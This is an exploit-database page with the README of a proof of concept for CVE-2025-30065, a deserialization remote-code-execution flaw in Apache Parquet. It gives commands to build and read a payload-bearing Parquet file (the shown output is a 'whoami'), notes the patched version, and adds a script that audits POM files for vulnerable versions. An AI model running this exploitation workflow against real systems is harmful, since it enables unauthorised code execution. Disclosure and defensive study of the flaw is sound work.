## https://sploitus.com/exploit?id=96E935DC-3088-5219-AD0F-8CDE2854825C
# CVE-2025-30065 - Parquet Deserialization PoC
This project demonstrates a safe proof-of-concept for CVE-2025-30065 using Apache Parquet and Java deserialization.
When a Parquet file containing a serialized Java object is read, the payload executes a visible command to prove code execution.
---
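## Usage
### Generate the Parquet payload and read it back:
```bash
# Step 1: write the Parquet file that carries the payload
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadWriter
# Step 2: read the file back with the vulnerable Parquet version
docker-compose run --rm maven-parquet mvn compile exec:java -Dexec.mainClass=ParquetPayloadReader
```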
You should see something like:
```
[payload output] {output of whoami}
```
### Won't work in patched 1.15.1
Change the Parquet version in /app/pom.xml from the vulnerable <1.15.0 to 1.15.1 and run the steps again. The PoC will no longer work.
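The version switch above can be turned into a dependency audit. The following is an added example, not part of the PoC repository: it parses a pom.xml, resolves `${property}` versions, and flags `org.apache.parquet` dependencies below 1.15.1, the release this page names as patched. `SAMPLE_POM`, `audit_pom` and the helper names are constructed for illustration, and treating every version below 1.15.1 as affected is an assumption.

```python
import re
import xml.etree.ElementTree as ET

FIXED = (1, 15, 1)  # per the page, the PoC no longer works at 1.15.1
GROUP = "org.apache.parquet"  # Maven groupId of the Parquet Java artifacts

# Constructed sample POM (not the PoC project's actual /app/pom.xml).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><parquet.version>1.14.4</parquet.version></properties>
  <dependencies>
    <dependency><groupId>org.apache.parquet</groupId>
      <artifactId>parquet-avro</artifactId><version>${parquet.version}</version></dependency>
    <dependency><groupId>org.apache.parquet</groupId>
      <artifactId>parquet-hadoop</artifactId><version>1.15.1</version></dependency>
    <dependency><groupId>org.apache.parquet</groupId>
      <artifactId>parquet-column</artifactId></dependency>
  </dependencies>
</project>"""

def _local(tag):
    """Drop the XML namespace so namespaced and plain POMs both match."""
    return tag.rsplit("}", 1)[-1]

def _parse_version(text):
    """'1.15.0-SNAPSHOT' -> (1, 15, 0); None when there is no leading number."""
    m = re.match(r"\d+(?:\.\d+)*", text)
    if not m:
        return None
    parts = tuple(int(p) for p in m.group().split("."))
    return parts + (0,) * (3 - len(parts))

def audit_pom(pom_xml):
    """Return [(artifactId, version, status)] for Parquet dependencies."""
    root = ET.fromstring(pom_xml)
    props = {_local(c.tag): (c.text or "").strip()
             for el in root.iter() if _local(el.tag) == "properties" for c in el}
    findings = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        f = {_local(c.tag): (c.text or "").strip() for c in dep}
        if f.get("groupId") != GROUP:
            continue
        # Resolve ${property} references; unresolved ones stay literal.
        ver = re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), f.get("version", ""))
        parsed = _parse_version(ver)
        status = "unknown" if parsed is None else "vulnerable" if parsed < FIXED else "patched"
        findings.append((f.get("artifactId"), ver or None, status))
    return findings
```

A dependency with no `<version>` (managed by a parent POM or BOM) is reported as `unknown`; resolve it with `mvn dependency:tree` before drawing a conclusion.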
### Links
- [BleepingComputer](https://www.bleepingcomputer.com/news/security/max-severity-rce-flaw-discovered-in-widely-used-apache-parquet/)
- [NIST CVE](https://nvd.nist.gov/vuln/detail/CVE-2025-30065)